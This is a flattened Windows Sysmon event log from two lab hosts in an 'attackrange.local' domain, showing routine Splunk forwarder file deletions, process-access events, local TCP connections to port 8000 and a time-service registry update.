07:52:05.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103818Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103817Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103816Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103815Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B2A5-615A-DA01-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103814Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2A5-615A-DA01-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103813Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:05.339{58E9C193-B2A5-615A-DA01-00000000FC01}5068C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:06.682{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F113F28AF7EBD3582DB6EEBDCD876AB,SHA256=39D42E50418093E801F7DF2D2AFA0391B1FE5A9EA5AC3C4B58D3929E5FC57CFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081655Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:06.359{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EEFD278601920AE16C51055F6C87E71,SHA256=3B6244845E198A58676FE46F1C9415085387089E562718F7BFC3725991F38384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:06.510{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1768E26E30C5E178A92170C5F71D5739,SHA256=8BC811F47834A4D34D5B28511D343BCD1B75AA165E753D0654FB914261698C7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:07.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71AF619AC252E137C51CDEFDC5567EEE,SHA256=FD517C4C9E025F5D551CD9C06DF18EA62BDDF28F14676A3F0B47E57AEDE225F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081656Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:07.359{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91B4F4165B602ACB96F9E83DC73B225A,SHA256=23C1D5DB362684234A309950E1C103EC219F85F4BFAE3B91DBA95208B31EB6EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:08.698{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=941A04141DB6AF401E4E9B5374EC4BDE,SHA256=0658DF773777B521FD8276328DD2C03190E3E6D7E65493EC08572214F738860B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081657Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:08.609{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCE53D067B91767B5DA4F55E4A393D5,SHA256=C32C0007D62F1B6AD6D3497D10F677D91C914B7A8823ECC75A2593F09C33680F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000103825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:08.073{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0xbb117d50) 23542300x8000000000000000103828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:09.745{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A6F441FA617947C3EB4A8F7433EB3DC,SHA256=8BB7E31B20B4A0E61E446D5253F798516052957DEC758926D1A1B3D9D9591373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081659Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:09.703{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A41F2DC248BC018DD2138D043CE237F,SHA256=E65E2A71CA286DF3110BC1E08B0694A264043AE00FF561EA8EBBDF4F96BEA648,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103827Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:08.293{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49551-false10.0.1.12-8000- 354300x800000000000000081658Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:07.802{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50045-false10.0.1.12-8000- 23542300x8000000000000000103829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:10.807{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=372ED1DD9800BC112B17F3E498419F2F,SHA256=8B734DE7304EA613B749EFC982E6AFBD0BAB7863C1FAB938C297B62EFFAAAF7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081660Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:10.734{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5C3E7CD2ED352788848415B375D037,SHA256=8C606498DBF6AA7A22F145234C5BFB047B4EF24AC84D2DCD681FD1DBCBBBF4C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:11.823{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3655F92D0F8112D08BFD693C876B1CA9,SHA256=D81E5B18A9480874AADEE2E77E53C6AF2892BEDEC28AF673A42982370B2540CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081661Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:11.765{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4713330BA011BBFE5DFE1F738A7E8F81,SHA256=3B3B1EA418DF9038EECDDD88F09AB21C9273C059220415DFD44447AF5747802F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:12.870{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27185A43E68D8C29E688A10CBE35C454,SHA256=29EA157538EFB3DAD84B1F80BDCA4CFE6C90D8A3B70BC56FAE0ACA0C7B315A77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081662Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:12.812{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ADF7C4ACC0F35E9ED5A05939A62F32A,SHA256=94AD833E621C63BD31E53557171D1A000389C5C6BC553710BB8B6D8204ACBBE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:13.901{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39E5111E06F9186AD7F75BC2FF107C01,SHA256=8A6DAD33BA1520435CAF5D817D60B483B164DE58E15F8ADD42581484E7353181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081663Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:13.875{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92EEE0C665C8808671D46124205757A5,SHA256=123A663F821CC0ED44B33D6E0D58A184779B8A6E3AA9437E9991117226A3E25E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081664Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:14.890{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D612AC3C338EBE8B9DC0B496B88C0CA3,SHA256=AE6E9A5D94DBCCBB60F9F5F6F94D4824716B64F95B8F8F16E402F7D997EE33E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:14.901{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B824C880BFD7C8013BABADAC59AA860,SHA256=0D5116D5863C52A8B242549E05F2736D974B6AFD5C0A9463903CFD9722633ECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:15.933{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837BC0424E07000FAA2156EC5C37CDC5,SHA256=F9378D511E756D8093F6D6F411B8369BF5503F2AAF70A9E47FC528A32D6E6E4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081666Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:15.922{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E968555F4699E9B4542D5C9D6E8DF92,SHA256=026D372D5464457548CB8928FED8A5B83F95503A8CA9701853D0038248E27AC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081665Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:13.677{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50046-false10.0.1.12-8000- 354300x8000000000000000103834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:14.262{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49552-false10.0.1.12-8000- 23542300x8000000000000000103836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:16.994{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DA70574B70282D3A38D93E5AD3CCAD3,SHA256=AE8FBDC3FD2CF936E4ABA78F9D00559EABBFEF290174DC2B45C466AC3F69B7B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081667Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:16.929{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C53F82F9D61ABF2C1FBA559592F7B6,SHA256=04AB4B174813ADD421139E23031F3DDE8F7B2F34E0B570F26C8B7313E0EB5146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:18.009{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3D08582EAC4E2E63753316A5288F94,SHA256=86FCE6B671D0FB1CFAD14FD9D0759A9314AEA32B732EF03ABA4B4B5B436BF322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081669Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:18.991{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=BA8B6042CBB9CBF960035A4535B5A029,SHA256=79A6303AD40DB2D32F9E7D0F73C0669083E7C4B87CC45746530BBF7DC7D0670B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081668Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:18.007{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C053CA4D186D54EAE5654C00AD8A4316,SHA256=ED5287B0111712795280B1D156F3EEDC39AD32DB5D0A43929343B582DC184DC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:19.009{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BEDDBAFB9A1BE7CCE1A2D0753485C78,SHA256=BF58AB03BBA14FF25B1F10C808F7E3A88674B2F6EF0FB333B24BE5ADD30C7910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081670Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:19.007{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0110BCCB0D17D6B3F99C0253F9294F39,SHA256=1889074D1EC075D22F6FFB0EF17ED5A045897EE5978DDBBB25B6C040331FE4B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081672Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:18.763{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50047-false10.0.1.12-8000- 23542300x800000000000000081671Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:20.007{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78D5C680CF55D9FFC624A424874D7CD2,SHA256=398D15D5739CD00EB6E44F0C82D6222745A95A2AD14F8DDA9C127F691DD12EE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:19.448{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49553-false10.0.1.12-8000- 23542300x8000000000000000103839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:20.087{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF4232FE4E24B3CA8A33A7A09A1794B5,SHA256=8E72951229AA3DBF35727DAEF4F7D319443E117878546A7815BF36C2AA58B535,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:21.103{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA8FC1824F92EE0181BE5812199D4C0,SHA256=3F29E49B276C57B3FF528A1D2CFE8C0F199C7FAE45F9AC6C2D0D11521261A390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081673Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:21.070{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D103833374DFAA7EA84132E758880574,SHA256=2A4802ABE6651F04AC478F6099438CBA8C5F4F2DB711B6D27FCB8FD9F3C4936B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 